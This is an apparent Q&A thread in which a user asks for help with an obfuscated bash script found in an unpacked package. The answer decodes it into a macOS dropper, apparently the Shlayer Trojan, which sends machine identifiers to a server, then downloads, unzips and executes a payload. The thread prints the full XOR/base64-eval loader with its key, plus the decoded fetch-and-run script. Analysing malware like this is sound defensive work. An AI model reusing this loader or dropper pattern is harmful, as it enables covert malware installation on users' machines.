# A suspicious bash code, who can help me interpret it?

Tags: bash, eval, obfuscation

Unpacking a package, I found a piece of code, because I am not good at bash, I don't know what to do, but I suspect it is a malicious code, who can help me interpret it.

```
#!/bin/bash
_l() {
    _i=0;_x=0;
    for ((_i=0; _i<${#1}; _i+=2)) do
        __return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
        if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
    done
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}

_m() {
    _v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
    __return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="8903139122"
_t="MWIxODFmNTE1ODVkMTY1MzUzNDE1MDE5M2EzOTc0N2Q3YTZlNjI3MzZiNmEwZDExMDkwYTA5MDIwMzAxMDEwODAyMDExMzM5Nzg2MTYyNmQ3Yzc2N2Q3Mjc4N2QwNDEzNDU0NTRmMTc1MTVlNTI1YTU3MWY0MTQyNTk1YTU1MTEzYjcyNjk2MTZkNjA3NzZjNjQ3NjBjMTE1ZDVlNDU1YzU0NTY1MTU3MWU1NzU1NDI0NjEwMzI0YzVlNDk1ODQzNjY0MTUzNDE0YjRlNWY0MTU1MGUxYjAzMDAwMzAxMGEwMTAwMDEwYTAxMDkwYjAyMGIwODAzMGEwMDAxMGIwODEwMzgzMjU2NDM2YzQ3NTY0YjQyNWI1ZDU2MDQxMjE3MTk0MDRlNmU0NDU3NGE0YTEwMWU0MTQxNTY1NTQ3NTE0YzZmNTU0MTQyNWE1NjVmMWIxMDE4MzM0MzU2NDI0MDUwNWU1YzZkNWY0YzU5NTcwYzExMWQxOTQ3NDc1MTVkNTc1NjVmMWExYjExMzg1ZjU5NWE1ODVhNWY1NjY2NTg1NjBmMWExZDE4NTY1MjViNTYxMTFmNWMxODFiMTQxYjU4NWM0YjU0NTUxMjE1NGI1NDAyMTExZTVhMTE3YjdkNjg1NTUxNDc1NzVjNGI1Yzc3NGE0ODVjNDI0Nzc1NTY0ZjU4NTE1NzE4NDUxMDU0NDM1NjQ5MTExZjVkMTgxZTEyN2E3ZTYzNTU1MDQ2NTQ1NzRiNWQ2NjY0N2E3ZDEzMTIwZjE4MWI2YzFiMWYxOTY1MTgxMDE1MTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzMxNzFiMTAxYTYzNjcxMjZlMWExYTFiNzE2ZTAzNzg0OTE3MWExMzEzNDUxMTQ2NDAxODE0NTQ1MDExMTQ2MjZhMDg0MjRhNTA1ZTQ3MGI2ZTY0MTYxYjEwMTgzMzNhNDY0MzVmMDQxMzVhNDY0YzQ5MGExYzFlMTc0MjcwNjI2MjY3N2Q3ZjdlNzA3YTc3NGMxZDE2NDM3ODYwNjM2ZTYxNzY2NDY2Nzc0NTA2NWQ1YTU1MGUxZDRhNWY1MzViNTE1OTVkNTQ2YzUwNTU0ZjE0NGIwNDE0NDg0MjU2NGE0MjViNWQ1NjY2NTc0NjU4NTc0NDE3NWQwZjFjNDI1ZjQwNmU0NTVjNDM0MTViNTc1NzRkMTU0MTBlMWQ0YTc3N2M3YjY2NjA3MjYyNjA0NDEzMzg0NjU1NDk2ZjQzNTA0NzUxMGMxMDE2MTA1NDViNDc1NDVlNDkxMTFkNDY1NTQ5MWY2YjY5NmI2MTY5NmE2YTYwNjExOTExM2I1MDRjNDM1ZTEyMTU1ZjAwN2YxMTExMWQ0YTQ3NDA1NDQ0MTIxMzBmMWM1ZDU0NDQxZDU2NGM1YzVmMTEwMTA3MTcwMzEyMDYwNzEwMTc0YTQ3NTQ0MTZkNDI1OTRkNTg0ZTExMzk1ODQxNDI2ZDVjNTA0MjBlMTMxNzExNWM1OTQ2NWQ1NDQwMTMxYzU3MTkxZTQ2NWY0ODE2Njg2YjY5NmI2MTY5NmE2YTExMTYxMjEzM2I0NjU3NGI1YjQyMTgxNDYwMTMxMzE3NDI0NDVjNDg1MTQ5NmY0MzUwNDA0YTQ2NWQ0MDVjNDQxMjEzMTMxNzQyNDU1ZjQyNjc0OTUxNDc1OTRlMWIxMTFmNTYxODFiMTQ0ODUwNDM0OTZlNTY1YjRhNDQxMjEzMGYxMzE2NTU1NzQ0MTc1NzQ1NWY1ZDEzMGIwZjE0MDMxODMzNDI1ZTExMWU1ZjExMTY0OTRjNTQ0MDZjNDE1MjRkNTk0ZjEyMzI1ZjU5NWY1NDZjNTc1MDVmNTcwNTFiMTQxYjU2NDE1YzQxMTIxZjU1MDgxMDFlNDcxMzFiMWIxYzUzNDg0OTEyMTMwZDFiNTU0MjEyMWYwOTE5MTIxNzRhNTI0OTQxNmQ1NjUxNGI0ZDExMTgxYTFiMTEzODQ0NTc1NTQ1NWU1NDZjNTc1MDVmNTcwNTFiMTQxYjU0NTA1MTVlMTIxZjU2MTkxMjE3NGE2MzZlNzU0ZjEwMTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzM2NzE5MWQ2NDU3NTU0NTVlNTQ0MDE2NmE2YzFkNjUxMjE5MWMxZjE5Nzk2ZDAzNzI0ODFlMTkxMTExMzk0ZjVlNWU0NzU1NWM2ZjVkNTA1ZTVjMGMxMDE2NDM0ZjVmNWY0NDVlNWM2ZTVjNTM1NTVjMWYxYzExMWMxYzAzMDI0ZjFhMTkzYTUwNTk1ZTU2NTUxMjE5NDAxOTEyMTc0YTUyNDk0MTZkNTY1MTRiNGQxNzRhNTU1MDVkNTc2ZDU2NTg1ZDU2NGMxYzdhNWU1YzQ2NWQ1NzQ0NDAxZTdlNTg1MjdkNjExYTE2MWExMzNiNWM0OTU0NWMxMjE1NTgxMDExMTU0ODU4NDE0MjZkNWM1MDQyNGUxNTQ4NWY1ODVlNTc2NzU3NTE1ZTU0NGUxYjExMWYxZjU5NGI1NzQwMTExMTRhMTMxMjEwMWM0MjQzNTY0MjQwNTA1ZTVjNmQ1ZjRjNTk1NzRjMTExOTEzMTY0OTRlNTY1YzQ2NWM1NjY2NWY1MzVmNWQ0NDEyMzkK"

eval "$(_m "$_t" "$_y")"
```

Comment: Why do you suspect it is suspicious? Where did you find it?

Comment: The code is decrypted from a file, no other arguments

Comment: #!/bin/bash
cd "$(dirname "$BASH_SOURCE")"
fileDir="$(dirname "$(pwd -P)")"
eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:8903139122 <"$fileDir"/Resources/enc)"
Like this, decrypt from a file

Comment: That definitely looks like some obfuscated fun in the `_y` and `_t` variables. base64 decoding, eval, funky `printf`, oddball `(())` with some funky hexidecimal math. Looks suspicious as hell. Remove that `eval` and echo the results.

Comment: Code like this is why installation instructions like `curl $SOMEURL | bash` are a terrible idea.

Answer (score 4, accepted):

The two functions at the top `_l()` and `_m()` read in the two strings `_y` and `_t`. `_t` contains the obfuscated code and `_y` acts sort of like a key. The key is applied, letter by letter to the obfuscated code creating a base64 string that can be decoded into a bash program that the `eval` command can execute.

Removing `eval` and echoing the results like `echo "$(_m "$_t" "$_y")"` spits out the code that will be executed by the `eval` command. This is perfectly safe since we aren't actually `eval`uating the obfuscated code now:

```
#!/bin/bash

ENC_PASS=<somepasswordhere>
APP_DOMAIN=<somewebsite>
APP_ROUTE="download/dlst"
unzip_password=<anotherpasswordhere>

os_version="$(sw_vers -productVersion)"
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"

url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1
rm -f ${tmp_path}
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))"
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')"
volume_name="${volume_name// /%20}"
chmod +x "${app_dir}${file_name}/Contents/MacOS"/*
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"
```

I would suggest NOT running that. Editted to remove the website and passwords *just in case* this obfuscation is done by some very crafty but derilect developer and isn't actually malicious... although this is almost definitely malicious. You can run without the `eval` yourself to see the redacted bits.

At a high level this sends your comp info up to a server and downloads a zip file. The zip file is unzipped, the contents are made executable, and then they are executed. This will only work on Mac due to the `MacOS` subfolder in the zip (duh) but also the use of `ioreg` program to collect the data stored in `machine_id` which is sent to the remote server.

Next step is to get that zip and see what it does. I'm not downloading it though ;)

Comment: It looks like the Shlayer Trojan in bash.
They have a python version now !